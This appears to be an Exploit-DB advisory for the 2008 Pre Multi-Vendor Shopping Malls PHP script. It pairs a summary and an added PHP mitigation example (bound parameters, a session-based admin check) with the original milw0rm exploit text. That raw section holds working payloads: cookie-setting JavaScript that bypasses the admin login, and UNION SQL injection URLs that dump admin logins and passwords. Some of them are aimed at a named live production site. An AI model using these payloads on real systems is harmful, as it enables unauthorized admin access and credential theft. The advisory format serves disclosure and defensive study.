Vendor: Pre Multi-Vendor Shopping Malls
By: G4N0K
CVSS: 8.8 HIGH
Insecure Cookie Handling, SQL Injection
CWE: 79, 89
Product Name: Pre Multi-Vendor Shopping Malls
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Pre Multi-Vendor Shopping Malls Multiple Vulnerabilities

Pre Multi-Vendor Shopping Malls is vulnerable to insecure cookie handling and SQL injection. The admin panel trusts the client-supplied cookies adminname and adminid, so an attacker who sets them in the browser gains access to the admin panel. The buyer_detail.php page is also injectable through its sid and cid parameters, which lets an attacker read the admin credentials from the database.

Mitigation:

Ensure that all user input is properly sanitized and validated before being used in SQL queries. Use parameterized queries to prevent SQL injection.
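
An added example (not the vendor's code or part of the original advisory) of the mitigation for both issues: integer validation plus PDO bound parameters for the buyer_detail.php IDs, and an admin check that reads server-side session state instead of cookies. The table name, its columns, the session key admin_id and the helper names are assumptions, and the demo row is constructed.

```php
<?php
declare(strict_types=1);

// Reject anything that is not a positive integer ID before it reaches SQL.
function require_int_param(array $query, string $name): int
{
    $value = filter_var($query[$name] ?? null, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1]]);
    if ($value === false) {
        throw new InvalidArgumentException("invalid parameter: $name");
    }
    return $value;
}

// Table and column names are assumptions; the product's real schema is not on this page.
function fetch_buyer_detail(PDO $pdo, array $query): ?array
{
    $stmt = $pdo->prepare(
        'SELECT prodid, custid, sid, cid, note FROM buyer_detail
          WHERE prodid = :prodid AND custid = :custid AND sid = :sid AND cid = :cid'
    );
    foreach (['prodid', 'custid', 'sid', 'cid'] as $name) {
        $stmt->bindValue(":$name", require_int_param($query, $name), PDO::PARAM_INT);
    }
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Admin status must come from server-side session state written at login,
// never from client-settable cookies such as adminname / adminid.
function is_admin(array $session): bool
{
    return isset($session['admin_id']) && is_int($session['admin_id']);
}

// Constructed demo data in an in-memory SQLite database (requires pdo_sqlite).
$pdo = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$pdo->exec('CREATE TABLE buyer_detail (prodid INT, custid INT, sid INT, cid INT, note TEXT)');
$pdo->exec("INSERT INTO buyer_detail VALUES (350, 240, 111, 26, 'constructed row')");
$ok = ['prodid' => '350', 'custid' => '240', 'sid' => '111', 'cid' => '26'];
var_dump(fetch_buyer_detail($pdo, $ok)['note']);
$bad = ['sid' => '-111 UNION ALL SELECT 1,2,3,4,5--'] + $ok; // non-integer sid
try {
    fetch_buyer_detail($pdo, $bad);
} catch (InvalidArgumentException $e) {
    echo "rejected: ", $e->getMessage(), "\n";
}
var_dump(is_admin([])); // an empty session is not an admin, whatever cookies were sent
```

On MySQL, also set PDO::ATTR_EMULATE_PREPARES to false so the values are bound by the server rather than interpolated client-side.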

Exploit-DB raw data:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                              IN THE NAME OF ALLAH
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Pre Multi-Vendor Shopping Malls Multiple Vulnerabilities
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

[~] Script:         	Pre Multi-Vendor Shopping Malls | Preproject MCart | PRE MULTI-VENDOR E-COMMERCE SOLUTION
[~] Language :         	PHP
[~] Website[main]:     	http://www.preproject.com
[~] Website[script]:    http://www.preproject.com/mcart.asp
[~] Type :             	Commercial
[~] Report-Date :     	05/11/2008
[~] Founder :			G4N0K <mail.ganok[at]gmail.com>

===============================================================================

===[ Insecure Cookie Handling ]===
admin-panel: http://localhost/[path]/SiteAdmin/
[0] javascript:document.cookie = "adminname=admin";
[1] javascript:document.cookie = "adminid=admin";

===[ LIVE ]===
admin-panel: http://preproject.com/prebay/siteadmin/
[0] javascript:document.cookie = "adminname=admin";
[1] javascript:document.cookie = "adminid=admin";



===[ SQL ]===
[!] http://localhost/[path]/buyer_detail.php?prodid=350&custid=240&sid=-111+UNION+ALL+SELECT+1,2,concat(user(),0x3a,version()),4,5--&cid=26
[!] http://localhost/[path]/buyer_detail.php?prodid=350&custid=240&sid=-111+UNION+ALL+SELECT+1,2,concat(login,0x3a,password),4,5+FROM+admin--&cid=26
[!] http://localhost/[path]/buyer_detail.php?prodid=350&custid=240&sid=111&cid=-26+UNION+ALL+SELECT+1,concat(login,0x3a,password),3,4+FROM+admin--



===[ SQL-LIVE ]===
[+] http://preproject.com/prebay/buyer_detail.php?prodid=350&custid=240&sid=-111+UNION+ALL+SELECT+1,2,concat(user(),0x3a,version()),4,5--&cid=26
[+] http://preproject.com/prebay/buyer_detail.php?prodid=350&custid=240&sid=-111+UNION+ALL+SELECT+1,2,concat(login,0x3a,password),4,5+FROM+admin--&cid=26
[+] http://preproject.com/prebay/buyer_detail.php?prodid=350&custid=240&sid=111&cid=-26+UNION+ALL+SELECT+1,concat(login,0x3a,password),3,4+FROM+admin--


===[ Greetz ]===
[~] ALLAH
[~] Tornado2800 <Tornado2800[at]gmail.com>
[~] Hussain-X <darkangel_g85[at]yahoo.com>

//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
//ALLAH,forgimme...

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
exit(); //EoX
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

# milw0rm.com [2008-11-05]